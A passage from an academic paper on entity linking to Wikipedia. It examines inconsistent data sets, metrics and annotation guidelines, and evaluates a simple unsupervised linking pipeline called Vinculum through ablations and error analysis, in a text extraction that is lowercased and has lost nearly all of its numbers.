hoffart et al. ( ) x han and sun ( ) x x he et al. ( a) x x he et al. ( b) x x x cheng and roth ( ) x x x x sil and yates ( ) x x x li et al. ( ) x x cornolti et al. ( ) x x x tac-kbp participants x x x x table : a sample of papers on entity linking with the data sets used in each paper (ordered chronologically). tac-kbp proceedings comprise additional papers (mcnamee and dang, ; ji et al., ; ji et al., ; mayfield et al., ). our intention is not to exhaust related work but to illustrate how sparse evaluation impedes comparison. nil entities: in spite of wikipedia’s size, there are many real-world entities that are absent from the kb. when such a target is missing for a mention, it is said to link to a nil entity (mcnamee and dang, ) (aka out-of-kb or unlinkable entity (hoffart et al., )). in the tac kbp, in addition to deter- mining if a mention has no entity in the kb to link, all the mentions that represent the same real world entities must be clustered together. since our focus is not to create new entities for the kb, nil clustering is beyond the scope of this paper. the aida data sets similarly contain such nil annotations whereas ace and msnbc omit these mentions altogether. we only evaluate whether a mention with no suitable entity in the kb is predicted as nil. . evaluation metrics while a variety of metrics have been used for evalu- ation, there is little agreement on which one to use. however, this detail is quite important, since the choice of metric strongly biases the results. we de- scribe the most common metrics below. bag-of-concept f (ace, msnbc): for each document, a gold bag of wikipedia entities is evalu- ated against a bag of system output entities requiring exact segmentation match. this metric may have its historical reason for comparison but is in fact flawed since it will obtain % f for an annotation in which every mention is linked to the wrong entity, but the bag of entities is the same as the gold bag. micro accuracy (tac , tac , tac t): for a list of given mentions, the metric simply measures the percentage of correctly predicted links. tac-kbp b + f (tac , tac ): the men- tions that are predicted as nil entities are required to be clustered according to their identities (nil cluster- ing). the overall data set is evaluated using a entity cluster-based b + f . ner-style f (aida): similar to official conll ner f evaluation, a link is considered correct only if the mention matches the gold boundary and the linked entity is also correct. a wrong link with the correct boundary penalizes both precision and recall. we note that bag-of-concept f is equivalent to the measure for concept-to-wikipedia task proposed in (cornolti et al., ) and ner-style f is the same as strong annotation match. in the experiments, we use the official metrics for the tac data sets and ner-style f for the rest. no annotation guidelines not only do we lack a common data set for evalua- tion, but most prior researchers fail to even define the problem under study, before developing algorithms. often an overly general statement such as annotat- ing the mentions to “referent wikipedia pages” or “corresponding entities” is used to describe which entity link is appropriate. this section shows that failure to have a detailed annotation guideline causes a number of key inconsistencies between data sets. a few assumptions are subtly made in different papers, which makes direct comparisons unfair and hard to comprehend. . entity mentions: common or named? which entities deserve links? some argue for re- stricting to named entities. others argue that any phrase that can be linked to a wikipedia entity adds value. without a clear answer to this issue, any data set created will be problematic. it’s not fair to pe- nalize a nel system for skipping a common noun phrases; nor would it be fair to lower the precision of a system that “incorrectly” links a common concept. however, we note that including mentions of com- mon concepts is actually quite problematic, since the choice is highly subjective. example in december , hoke was hired as the head football coach at san diego state uni- versity. (wikipedia) at first glance, kb:american football seems the gold-standard link. however, there is another entity kb:college football, which is clearly also, if not more, appropriate. if one argues that kb:college football should be the right choice given the context, what if kb:college football does not exist in the kb? should nil be returned in this case? the question is unanswered. for the rest of this paper, we focus on the (better defined) problem of solely linking named entities. aquaint and csaw are therefore not used for eval- uation due to an disproportionate number of common concept annotations. . how specific should linked entities be? it is important to resolve disagreement when more than one annotation is plausible. the tac- kbp annotation guidelines (tac, ) specify that different iterations of the same organization (e.g. the kb: th u.s. congress and the kb: th u.s. congress) should not be con- sidered as distinct entities. unfortunately, this is not a common standard shared across the data sets, where often the most specific possible entity is preferred. example adams and platt are both injured and will miss england’s opening world cup qualifier against moldova on sunday. (aida) here the mention “world cup” is labeled as kb: fifa world cup, a specific occur- rence of the event kb:fifa world cup. it is indeed difficult to decide how specific the gold link should be. given a static knowledge base, which is often incomplete, one cannot always find the most specific entity. for instance, there is no wikipedia page for the kb: th u.s. congress be- cause the congress has not been elected yet. on the other hand, using general concepts can cause troubles for machine reading. consider president-of relation extraction on the following sentence. example joe biden is the senate president in the th united states congress. note that linking common noun phrases is closely related to word sense disambiguation (moro et al., ). we define named entity mention extensionally: any name uniquely referring to one entity of a predefined class, e.g. a specific person or location. person common concepts e.g. brain_tumor, desk, water, etc. misc.organization location tac gpe (geo- political entities) tac organization tac person figure : entities divided by their types. for named enti- ties, the solid squares represent conll(aida) classes; the red dashed squares display tac classes; the shaded rectangle depicts common concepts. failure to distinguish different congress iterations would cause an information extraction system to falsely extracting the fact that kb:joe biden is the senate president of the kb:united states congress at all times! . metonymy another situation in which more than one annotation is plausible is metonymy, which is a way of referring to an entity not by its own name but rather a name of some other entity it is associated with. a common example is to refer to a country’s government using its capital city. example moscow’s as yet undisclosed propos- als on chechnya’s political future have , mean- while, been sent back to do the rounds of various government departments. (aida) the mention here, “moscow”, is labeled as kb:government of russia in aida. if this sentence were annotated in tac-kbp, it would have been labeled as kb:moscow (the city) instead. even the country kb:russia seems to be a valid label. however, neither the city nor the country can ac- tually make a proposal. the real entity in play is kb:government of russia. . named entities, but of what types? even in the data sets consisting of solely named en- tities, the types of the entities vary and therefore the data distribution differs. tac-kbp has a clear definition of what types of entities require links, namely person, organization and geo-political enti- ties. aida, which adopted the ner data set from the conll shared task, includes entities from classes, person, organization, location and misc. com- http://www.cnts.ua.ac.be/conll /ner/ annotation.txt pared to the aida entity types, it is obvious that tac- kbp is more restrictive, since it does not have misc. entities (e.g. kb:fifa world cup). moreover, tac entities don’t include fictional characters or organizations, such as kb:sherlock holmes. tac gpes include some geographical regions, such as kb:france, but exclude those without govern- ments, such as kb:central california or lo- cations such as kb:murrayfield stadium. figure summarizes the substantial differences be- tween the two type sets. . can mention boundaries overlap? we often see one entity mention nested in another. for instance, a u.s. city is often followed by its state, such as “portland, oregon”. one can split the whole mention to individual ones, “portland” for the city and “oregon” for the city’s state. aida adopts this segmentation. however, annotations in an early tac- kbp dataset ( ) select the whole span as the men- tion. we argue that all three mentions make sense. in fact, knowing the structure of the mention would facilitate the disambiguation (i.e. the state name pro- vides enough context to uniquely identify the city entity). besides the mention segmentation, the links for the nested entities may also be ambiguous. example dorothy byrne, a state coordinator for the florida green party, said she had been in- undated with angry phone calls and e-mails from democrats, but has yet to receive one regretful note from a nader voter. the gold annotation from ace is kb:green party of florida even though the mention doesn’t contain “florida” and can arguably be linked to kb:us green party. a simple & modular linking method in this section, we present vinculum, a simple, unsupervised el system that performs compara- bly to the state of the art. as input, vinculum takes a plain-text document d and outputs a set of segmented mentions with their associated entities ad = {(mi, li)}. vinculum begins with mention extraction. for each identified mention m, candi- date entities cm = {cj} are generated for linking. vinculum assigns each candidate a linking score http://nlp.cs.rpi.edu/kbp/ /elquery.pdf http://www.cnts.ua.ac.be/conll /ner/annotation.txt http://www.cnts.ua.ac.be/conll /ner/annotation.txt http://nlp.cs.rpi.edu/kbp/ /elquery.pdf candidate generation entity type coreference coherence mention phrases less context sentence document world knowledge more context all possible entities one most likely entity figure : the process of finding the best entity for a mention. all possible entities are sifted through as vinculum proceeds at each stage with a widening range of context in consideration. s(cj|m,d) based on the entity type compatibility, its coreference mentions, and other entity links around this mention. the candidate entity with the maxi- mum score, i.e. l = arg max c∈cm s(c|m,d), is picked as the predicted link of m. figure illustrates the linking pipeline that follows mention extraction. for each mention, vinculum ranks the candidates at each stage based on an ever widening context. for example, candidate generation (section . ) merely uses the mention string, entity typing (section . ) uses the sentence, while corefer- ence (section . ) and coherence (section . ) use the full document and web respectively. our pipeline mimics the sieve structure introduced in (lee et al., ), but instead of merging coreference clusters, we adjust the probability of candidate entities at each stage. the modularity of vinculum enables us to study the relative impact of its subcomponents. . mention extraction the first step of el extracts potential mentions from the document. since vinculum restricts attention to named entities, we use a named entity recogni- tion (ner) system (finkel et al., ). alternatively, an np chunker may be used to identify the mentions. . dictionary-based candidate generation while in theory a mention could link to any entity in the kb, in practice one sacrifices little by restricting attention to a subset (dozens) precompiled using a dictionary. a common way to build such a dictionary d is by crawling web pages and aggregating anchor links that point to wikipedia pages. the frequency with which a mention (anchor text), m, links to a par- ticular entity (anchor link), c, allows one to estimate the conditional probability p(c|m). we adopt the crosswikis dictionary, which was computed from a google crawl of the web (spitkovsky and chang, ). the dictionary contains more than million unique strings with the entities they may represent. in the literature, the dictionary is often built from the anchor links within the wikipedia website (e.g., (ratinov et al., ; hoffart et al., )). in addition, we employ two small but precise dic- tionaries for u.s. state abbreviations and demonyms when the mention satisfies certain conditions. for u.s. state abbreviations, a comma before the men- tion is required. for demonyms, we ensure that the mention is either an adjective or a plural noun. . incorporating entity types for an ambiguous mention such as “washington”, knowing that the mention denotes a person allows an el system to promote kb:george washington while lowering the rank of the capital city in the candi- date list. we incorporate this intuition by combining it probabilistically with the crosswikis prior. p(c|m,s) = ∑ t∈t p(c,t|m,s) = ∑ t∈t p(c|m,t,s)p(t|m,s) , where s denotes the sentence containing this men- tion m and t represents the set of all possible types. we assume the candidate c and the sentential con- text s are conditionally independent if both the men- tion m and its type t are given. in other words, p(c|m,t,s) = p(c|m,t), the rhs of which can be estimated by renormalizing p(c|m) w.r.t. type t: p(c|m,t) = p(c|m)∑ c →t p(c|m) , where c → t indicates that t is one of c’s entity types. the other part of the equation, p(t|m,s), can be estimated by any off-the-shelf named entity recognition system, e.g. finkel et al. ( ) and ling and weld ( ). . coreference it is common for entities to be mentioned more than once in a document. since some mentions are less ambiguous than others, it makes sense to use the we notice that an entity often has multiple appropriate types, e.g. a school can be either an organization or a location depend- ing on the context. we use freebase to provide the entity types and map them appropriately to the target type set. most representative mention for linking. to this end, vinculum applies a coreference resolution system (e.g. lee et al. ( )) to cluster coreferent mentions. the representative mention of a cluster is chosen for linking. while there are more sophisticated ways to integrate el and coreference (hajishirzi et al., ), vinculum’s pipeline is simple and modular. . coherence when kb:barack obama appears in a document, it is more likely that the mention “washington” rep- resents the capital kb:washington, d.c. as the two entities are semantically related, and hence the joint assignment is coherent. a number of re- searchers found inclusion of some version of coher- ence is beneficial for el (cucerzan, ; milne and witten, ; ratinov et al., ; hoffart et al., ; cheng and roth, ). for incorporating it in vinculum, we seek a document-wise assignment of entity links that maximizes the sum of the coher- ence scores between each pair of entity links pre- dicted in the document d, i.e. ∑ ≤i<j≤|md| φ(lmi, lmj ) where φ is a function that measures the coherence between two entities, md denotes the set of all the mentions detected in d and lmi (lmj ) is one of the candidates of mi(mj). instead of searching for the exact solution in a brute-force manner (o(|c||md|) where |c| = max m∈md |cm|), we isolate each mention and greedily look for the best candidate by fixing the predictions of other mentions, allowing linear time search (o(|c| · |md|)). specifically, for a mention m and each of its candidates, we compute a score, coh(c) = |pd|− ∑ p∈pd\{pm} φ(p,c),c ∈ cm, where pd is the union of all intermediate links {pm} in the document. since both measures take values between and , we denote the coherence score coh(c) as pφ(c|pd), the conditional probability of an entity given other entities in the document. the final score of a can- note that the representative mention in coreference reso- lution is not always the best mention for linking. when the representative mention contains a relative clause, we use the submention without the clause, which is favorable for candidate generation. when the representative mention is a location, a longer, non-conjunctive mention is preferred if possible. we also apply some heuristics to find organization acronyms, etc. didate is the sum of coherence pφ(c|pd) and type compatibility p(c|m,s). two coherence measures have been found to be useful: normalized google distance (ngd) (milne and witten, ; ratinov et al., ) and rela- tional score (cheng and roth, ). ngd be- tween two entities ci and cj is defined based on the link structure between wikipedia articles as follows: φngd(ci,cj) = − log(max(|li|,|li|))−log(|li∩lj|)log(w)−log(min(|li|,|li|)) where li and lj are the incoming (or outgoing) links in the wikipedia articles for ci and cj respectively and w is the total number of entities in wikipedia. the relational score between two entities is a binary indicator whether a relation exists between them. we use freebase as the source of the relation triples f = {(sub,rel,obj)}. relational coherence φrel is thus defined as φrel(ei,ej) = { ∃r,(ei,r,ej) or (ej,r,ei) ∈ f otherwise. experiments in this section, we present experiments to address the following questions: • is ner sufficient to identify mentions? (sec. . ) • how much does candidate generation affect final el performance? (sec. . ) • how much does entity type prediction help el? what type set is most appropriate? (sec. . ) • how much does coherence improve the el results? (sec. . ) • how well does vinculum perform compared to the state-of-the-art? (sec. . ) • finally, which of vinculum’s components con- tribute the most to its performance? (sec. . ) . mention extraction we start by using stanford ner for mention extrac- tion and measure its efficacy by the recall of correct mentions shown in table . tac data sets are not included because the mention strings are given in that competition. the results indicate that at least % of the gold-standard mentions are left out when ner, the mapping between freebase and wikipedia is provided at https://developers.google.com/freebase. https://developers.google.com/freebase ace msnbc aida-dev aida-test r p r p r p r p ner . . . . . . . . +np . . . . . . . . +dp . . . . . . . . +np+dp . . . . . . . . table : performance(%, r: recall; p: precision) of the correct mentions using different mention extraction strategies. ace and msnbc only annotate a subset of all the mentions and therefore the absolute values of precision are largely underestimated. alone, is used to detect mentions. some of the miss- ing mentions are noun phrases without capitalization, a well-known limitation of automated extractors. to recover them, we experiment with an np chunker (np) and a deterministic noun phrase extractor based on parse trees (dp). although we expect them to introduce spurious mentions, the purpose is to esti- mate an upper bound for mention recall. the results confirm the intuition: both methods improve recall, but the effect on precision is prohibitive. therefore, we only use ner in subsequent experiments. note that the recall of mention extraction is an upper bound of the recall of end-to-end predictions. . candidate generation in this section, we inspect the performance of can- didate generation. we compare crosswikis with an intra-wikipedia dictionary and freebase search api . each candidate generation component takes a mention string as input and returns an ordered list of candidate entities representing the mention. the candidates produced by crosswikis and the intra- wikipedia dictionary are ordered by their conditional probabilities given the mention string. freebase api provides scores for the entities using a combination of text similarity and an in-house entity relevance score. we compute candidates for the union of all the non-nil mentions from all data sets and mea- sure their efficacy by recall@k. from figure , it is clear that crosswikis outperforms both the intra- wikipedia dictionary and freebase search api for almost all k. the intra-wikipedia dictionary is on a par with crosswikis at k = but in general has a opennlp np chunker: opennlp.apache.org adopted from aida (hoffart et al., ) https://www.googleapis.com/freebase/v / search, restricted to no more than candidates per query. inf . . . . k r e c a ll @ k crosswikis intra−wikipedia freebase search figure : recall@k on an aggregate of nine data sets, comparing three candidate generation methods. inf . . . . k r e c a ll @ k msnbc ace aida−dev aida−test tac tac tac t tac tac figure : recall@k using crosswikis for candidate gen- eration, split by data set. is chosen to be the cut-off value in consideration of both efficiency and accuracy. lower coverage of the gold candidates compared to crosswikis . freebase api offers a better coverage than the intra-wikipedia dictionary but is less effi- cient than crosswikis. in other words, freebase api needs a larger cut-off value to include the gold entity in the candidate set. using crosswikis for candidate generation, we plot the recall@k curves per data set (figure ). to our surprise, in most data sets, crosswikis alone can achieve more than % recall@ . the only excep- tions are tac and tac because the organizers intentionally selected the mentions that are highly ambiguous such as “abc” and/or incomplete such as “brown”. for efficiency, we set a cut-off threshold at (> % recall for all but one data set). note that crosswikis itself can be used a context-insensitive el system by looking up the mention string and predict- ing the entity with the highest conditional probability. the second row in table presents the results using this simple baseline. crosswikis alone, using only the mention string, has a fairly reasonable performance. we also compared to another intra-wikipedia dictionary (table in (ratinov et al., )). a recall of . % and . % is reported for ace and msnbc, respectively, at a cut- off level of . crosswikis has a recall of . % and . % at the same cut-off. opennlp.apache.org https://www.googleapis.com/freebase/v /search https://www.googleapis.com/freebase/v /search approach tac tac tac t tac tac aida-dev aida-test ace msnbc crosswikis only . . . . . . . . . +ner . . . . . . . . . +figer . . . . . . . . . +ner(gold) . . . . . . . . . +figer(gold) . . . . . . . . . table : performance (%) after incorporating entity types, comparing two sets of entity types (ner and figer). using a set of fine-grained entity types (figer) generally achieves better results. . incorporating entity types here we investigate the impact of the entity types on the linking performance. the most obvious choice is the traditional ner types (tner = {per, org, loc, misc}). to predict the types of the mentions, we run stanford ner (finkel et al., ) and set the predicted type tm of each mention m to have probability (i.e. p(tm|m,s) = ). as to the types of the entities, we map their freebase types to the four ner types . a more appropriate choice is fine-grained en- tity types introduced by ling and weld ( ) in figer, a publicly available package . these fine- grained types are not disjoint, i.e. each mention is allowed to have more than one type. for each men- tion, figer returns a set of types, each of which is accompanied by a score, tfiger(m) = {(tj,gj) : tj ∈ tfiger}. a softmax function is used to proba- bilistically interpret the results as follows: p(tj|m,s) = { z exp(gj) if (tj,gj) ∈ tfiger(m), otherwise where z = ∑ (tk,gk)∈tfiger(m) exp(gk). we evaluate the utility of entity types in table , which shows that using ner typically worsens the performance. this drop may be attributed to the rigid binary values for type incorporation; it is hard to output the probabilities of the entity types for a mention given the chain model adopted in stanford ner. we also notice that figer types consistently improve the results across the data sets, indicating that a finer-grained type set may be more suitable for the entity linking task. to further confirm this assertion, we simulate the scenario where the gold types are provided for each the freebase types “/person/*” are mapped to per, “/lo- cation/*” to loc, “/organization/*” plus a few others like “/sports/sports team” to org, and the rest to misc. http://github.com/xiaoling/figer mention (the oracle types of its gold entity). the per- formance is significantly boosted with the assistance from the gold types, which suggests that a better per- forming ner/figer system can further improve performance. similarly, we notice that the results using figer types almost consistently outperform the ones using ner types. this observation endorses our previous recommendation of using fine-grained types for el tasks. . coherence two coherence measures suggested in section . are tested in isolation to better understand their effects in terms of the linking performance (table ). in gen- eral, the link-based ngd works slightly better than the relational facts in out of data sets (comparing row “+ngd” with row “+rel”). we hypothesize that the inferior results of rel may be due to the in- completeness of freebase triples, which makes it less robust than ngd. we also combine the two by taking the average score, which in most data set performs the best (“+both”), indicating that two measures provide complementary source of information. . overall performance to answer the last question of how well does vinculum perform overall, we conduct an end-to- end comparison against two publicly available sys- tems with leading performance: aida (hoffart et al., ): we use the recom- mended graph variant of the aida package (ver- sion . . ) and are able to replicate their results when gold-standard mentions are given. we are also aware of other systems such as tagme- (fer- ragina and scaiella, ), dbpedia spotlight (mendes et al., ) and wikipediaminer (milne and witten, ). a trial test on the aida data set shows that both wikifier and aida tops the performance of other systems reported in (cornolti et al., ) and therefore it is sufficient to compare with these two systems in the evaluation. http://github.com/xiaoling/figer approach tac tac tac t tac tac aida-dev aida-test ace msnbc no coh . . . . . . . . . +ngd . . . . . . . . . +rel . . . . . . . . . +both . . . . . . . . . table : performance (%) after re-ranking candidates using coherence scores, comparing two coherence measures (ngd and rel). “no coh”: no coherence based re-ranking is used. “+both”: an average of two scores is used for re-ranking. coherence in general helps: a combination of both measures often achieves the best effect and ngd has a slight advantage over rel. approach tac tac tac t tac tac aida-dev aida-test ace msnbc overall crosswikis . . . . . . . . . . +figer . . . . . . . . . . +coref . . . . . . . . . . +coherence =vinculum . . . . . . . . . . aida . . . . . . . . . . wikifier . . . . . . . . . . table : end-to-end performance (%): we compare vinculum in different stages with two state-of-the-art systems, aida and wikifier. the column “overall” lists the average performance of nine data sets for each approach. crosswikis appears to be a strong baseline. vinculum is . % shy from wikifier, each winning in four data sets; aida tops both vinculum and wikifier on aida-test. wikifier (cheng and roth, ): we are able to reproduce the reported results on ace and msnbc and obtain a close enough b + f number on tac ( . % vs . %). since wikifier overgenerates mentions and produce links for common concepts, we restrict its output on the aida data to the men- tions that stanford ner predicts. table shows the performance of vinculum after each stage of candidate generation (cross- wikis), entity type prediction (+figer), coreference (+coref) and coherence (+coherence). the column “overall” displays the average of the performance numbers for nine data sets for each approach. wiki- fier achieves the highest in the overall performance. vinculum performs quite comparably, only . % shy from wikifier, despite its simplicity and un- supervised nature. looking at the performance per data set, vinculum and wikifier each is superior in out of data sets while aida tops the perfor- mance only on aida-test. the performance of all the systems on tac is generally lower than on the other dataset, mainly because of a low recall in the candidate generation stage. we notice that even using crosswikis alone works pretty well, indicating a strong baseline for future comparisons. the entity type prediction provides the highest boost on performance, an absolute . % increase, among other subcomponents. the corefer- ence stage and the coherence stage also give a rea- sonable lift. in terms of running time, vinculum runs reason- ably fast. for a document with - entity mentions on average, vinculum takes only a few seconds to finish the linking process on one single thread. . system analysis we outline the differences between the three system architectures in table . for identifying mentions to link, both vinculum and aida rely solely on ner detected mentions, while wikifier additionally in- cludes common noun phrases, and trains a classifier to determine whether a mention should be linked. for candidate generation, crosswikis provides better coverage of entity mentions. for example, in fig- ure , we observe a recall of . % at a cut-off of by crosswikis, outperforming . % by aida’s dictionary. further, hoffart et al. ( ) report a precision of . % using gold mentions on aida- test, while crosswikis achieves a higher precision at . %. both aida and wikifier use coarse ner types as features, while vinculum incorpo- rates fine-grained types that lead to dramatically im- proved performance, as shown in section . . the differences in coreference and coherence are not cru- vinculum aida wikifier mention extraction ner ner ner, noun phrases candidate generation crosswikis an intra-wikipedia dictionary an intra-wikipedia dictionary entity types figer ner ner coreference find the representative mention - re-rank the candidates coherence link-based similarity, relation triples link-based similarity link-based similarity, relation triples learning unsupervised trained on aida trained on a wikipedia sample table : comparison of entity linking pipeline architectures. vinculum components are described in detail in section , and correspond to figure . components found to be most useful for vinculum are highlighted. cial to performance, as they each provide relatively small gains. finally, vinculum is an unsupervised system whereas aida and wikifier are trained on labeled data. reliance on labeled data can often hurt performance in the form of overfitting and/or incon- sistent annotation guidelines; aida’s lower perfor- mance on tac datasets, for instance, may be caused by the different data/label distribution of its train- ing data from other datasets (e.g. conll- con- tains many scoreboard reports without complete sen- tences, and the more specific entities as annotations for metonymic mentions). we analyze the errors made by vinculum and categorize them into six classes (table ). “metonymy” consists of the errors where the men- tion is metonymic but the prediction links to its lit- eral name. the errors in “wrong entity types” are mainly due to the failure to recognize the correct en- tity type of the mention. in table ’s example, the link would have been right if figer had correctly predicted the airport type. the mistakes by the coref- erence system often propagate and lead to the errors under the “coreference” category. the “context” cat- egory indicates a failure of the linking system to take into account general contextual information other than the fore-mentioned categories. “specific labels” refers to the errors where the gold label is a specific instance of a general entity, includes instances where the prediction is the parent company of the gold en- tity or where the gold label is the township whereas the prediction is the city that corresponds to the town- ship. “misc” accounts for the rest of the errors. in the example, usually the location name appearing in the byline of a news article is a city name; and vinculum, without knowledge of this convention, mistakenly links to a state with the same name. the distribution of errors shown in table pro- vides valuable insights into vinculum’s varying performance across the nine datasets. first, we ob- serve a notably high percentage of metonymy-related errors. since many of these errors are caused due to incorrect type prediction by figer, improvements in type prediction for metonymic mentions can provide substantial gains in future. the especially high per- centage of metonymic mentions in the aida datasets thus explains vinculum’s lower perfomance there (see table ). second, we note that vinculum makes quite a number of “context” errors on the tac and tac datasets. one possible reason is that when highly ambiguous mentions have been intentionally selected, link-based similarity and relational triples are insufficient for capturing the context. for exam- ple, in “... while returning from freeport to port- land. (tac)”, the mention “freeport”is unbounded by the state, one needs to know that it’s more likely to have both “freeport” and “portland” in the same state (i.e. maine) to make a correct prediction . another reason may be tac’s higher percentage of web documents; since contextual information is more scattered in web text than in newswire docu- ments, this increases the difficulty of context model- ing. we leave a more sophisticated context model for future work (chisholm and hachey, ; singh et al., ). since “specific labels”, “metonymy”, and “wrong entity types” correspond to the annotation issues discussed in sections . , . , and . , the distribution of errors are also useful in studying annotation inconsistencies. the fact that the er- rors vary considerably across the datasets, for in- stance, vinculum makes many more “specific labels” mistakes in ace and msnbc, strongly suggests that annotation guidelines have a consid- erable impact on the final performance. we also observe that annotation inconsistencies also cause reasonable predictions to be treated as a mistake, e.g. cucerzan ( ) use geo-coordinates as features. category example gold label prediction metonymy south africa managed to avoid a fifth successive defeat in at the hands of the all blacks ... south africa national rugby union team south africa wrong entity types instead of los angeles international, for example, consider flying into burbank or john wayne airport ... bob hope airport burbank, california coreference it is about his mysterious father, barack hussein obama, an imperious if alluring voice gone distant and then missing. barack obama sr. barack obama context scott walker removed himself from the race, but green never really stirred the passions of former walker supporters, nor did he garner out- sized support “outstate”. scott walker (politician) scott walker (singer) specific labels what we like would be seles , ( olympic champion lindsay ) davenport and mary joe fernandez . summer olympics olympic games misc new york - - new york city new york table : we divide linking errors into six error categories and provide an example for each class. error category tac tac tac t tac tac aida-dev aida-test ace msnbc metonymy . % . % . % . % . % . % . % . % . % wrong entity types . % . % . % . % . % . % . % . % . % coreference . % . % . % . % . % . % . % . % . % context . % . % . % . % . % . % . % . % . % specific labels . % . % . % . % . % . % . % . % . % misc . % . % . % . % . % . % . % . % . % # of examined errors table : error analysis: we analyze a random sample of of vinculum’s errors, categorize the errors into six classes, and display the frequencies of each type across the nine datasets. for example, aida predicts kb:west virginia mountaineers football for “..., alabama of- fered the job to rich rodriguez, but he decided to stay at west virginia. (msnbc)” but the gold label is kb:west virginia university. related work most related work has been discussed in the earlier sections; see shen et al. ( ) for an el survey. two other papers deserve comparison. cornolti et al. ( ) present a variety of evaluation measures and experimental results on five systems compared head- to-head. in a similar spirit, hachey et al. ( ) pro- vide an easy-to-use evaluation toolkit on the aida data set. in contrast, our analysis focuses on the prob- lem definition and annotations, revealing the lack of consistent evaluation and a clear annotation guide- line. we also show an extensive set of experimental results conducted on nine data sets as well as a de- tailed ablation analysis to assess each subcomponent of a linking system. conclusion and future work despite recent progress in entity linking, the com- munity has had little success in reaching an agree- ment on annotation guidelines or building a standard benchmark for evaluation. when complex el sys- tems are introduced, there are limited ablation studies for readers to interpret the results. in this paper, we examine el data sets and discuss the inconsisten- cies among them. to have a better understanding of an el system, we implement a simple yet effective, unsupervised system, vinculum, and conduct ex- tensive ablation tests to measure the relative impact of each component. from the experimental results, we show that a strong candidate generation component (crosswikis) leads to a surprisingly good result; us- ing fine-grained entity types helps filter out incorrect links; and finally, a simple unsupervised system like vinculum can achieve comparable performance with existing machine-learned linking systems and, therefore, is suitable as a strong baseline for future research. there are several directions for future work. we hope to catalyze agreement on a more precise el an- notation guideline that resolves the issues discussed in section . we would also like to use crowdsourc- ing (bragg et al., ) to collect a large set of these annotations for subsequent evaluation. finally, we hope to design a joint model that avoids cascading errors from the current pipeline (wick et al., ; durrett and klein, ). acknowledgements the authors thank luke zettle- moyer, tony fader, kenton lee, mark yatskar for constructive suggestions on an early draft and all members of the loudlab group and the lil group for helpful discussions. we also thank the action edi- tor and the anonymous reviewers for valuable com- ments. this work is supported in part by the air force research laboratory (afrl) under prime con- tract no. fa - - - , an onr grant n - - - , a wrf / tj cable professorship, a gift from google, an aro grant number w nf- - - , and by terraswarm, one of six centers of starnet, a semiconductor research corporation program sponsored by marco and darpa. any opinions, findings, and conclusion or recommenda- tions expressed in this material are those of the au- thor(s) and do not necessarily reflect the view of darpa, afrl, or the us government. references jonathan bragg, andrey kolobov, and daniel s weld. . parallel task routing for crowdsourcing. in sec- ond aaai conference on human computation and crowdsourcing. xiao cheng and dan roth. . relational inference for wikification. in emnlp. andrew chisholm and ben hachey. . entity disam- biguation with web links. transactions of the associa- tion for computational linguistics, : – . marco cornolti, paolo ferragina, and massimiliano cia- ramita. . a framework for benchmarking entity- annotation systems. in proceedings of the nd interna- tional conference on world wide web, pages – . international world wide web conferences steering committee. mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molecu- lar biology (ismb- ), pages – . s. cucerzan. . large-scale named entity disam- biguation based on wikipedia data. in proceedings of emnlp-conll, volume , pages – . silviu cucerzan. . the msr system for entity linking at tac . in text analysis conference . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association for computational linguis- tics, : – . paolo ferragina and ugo scaiella. . fast and ac- curate annotation of short texts with wikipedia pages. ieee software, ( ): – . j.r. finkel, t. grenager, and c. manning. . incor- porating non-local information into information extrac- tion systems by gibbs sampling. in proceedings of the rd annual meeting on association for compu- tational linguistics, pages – . association for computational linguistics. ben hachey, joel nothman, and will radford. . cheap and easy entity evaluation. in acl. hannaneh hajishirzi, leila zilles, daniel s. weld, and luke zettlemoyer. . joint coreference resolution and named-entity linking with multi-pass sieves. in emnlp. xianpei han and le sun. . an entity-topic model for entity linking. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, pages – . association for computational linguistics. zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. a. learning entity rep- resentation for entity disambiguation. proc. acl . zhengyan he, shujie liu, yang song, mu li, ming zhou, and houfeng wang. b. efficient collective entity linking with stacking. in emnlp, pages – . johannes hoffart, mohamed a. yosef, ilaria bordino, ha- gen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing, pages – . as- sociation for computational linguistics. johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in proceedings of the rd international confer- ence on world wide web, pages – . international world wide web conferences steering committee. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational lin- guistics: human language technologies, volume , pages – . heng ji, ralph grishman, hoa trang dang, kira grif- fitt, and joe ellis. . overview of the tac knowledge base population track. in text analysis con- ference (tac ). mitchell koch, john gilmer, stephen soderland, and daniel s weld. . type-aware distantly supervised relation extraction with linked arguments. in emnlp. sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annotation of wikipedia entities in web text. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – . acm. heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational linguis- tics, pages – . yang li, chi wang, fangqiu han, jiawei han, dan roth, and xifeng yan. . mining evidences for named entity disambiguation. in proceedings of the th acm sigkdd international conference on knowledge dis- covery and data mining, pages – . acm. xiao ling and daniel s weld. . fine-grained entity recognition. in aaai. james mayfield, javier artiles, and hoa trang dang. . overview of the tac knowledge base popu- lation track. text analysis conference (tac ). p. mcnamee and h.t. dang. . overview of the tac knowledge base population track. text analysis conference (tac ). pablo n mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of the th international conference on semantic systems, pages – . acm. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the th acm con- ference on information and knowledge management, pages – . acm. andrea moro, alessandro raganato, and roberto navigli. . entity linking meets word sense disambiguation: a unified approach. transactions of the association for computational linguistics, . lev-arie ratinov, dan roth, doug downey, and mike anderson. . local and global algorithms for dis- ambiguation to wikipedia. in acl, volume , pages – . sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in ecml/pkdd ( ), pages – . wei shen, jianyong wang, and jiawei han. . entity linking with a knowledge base: 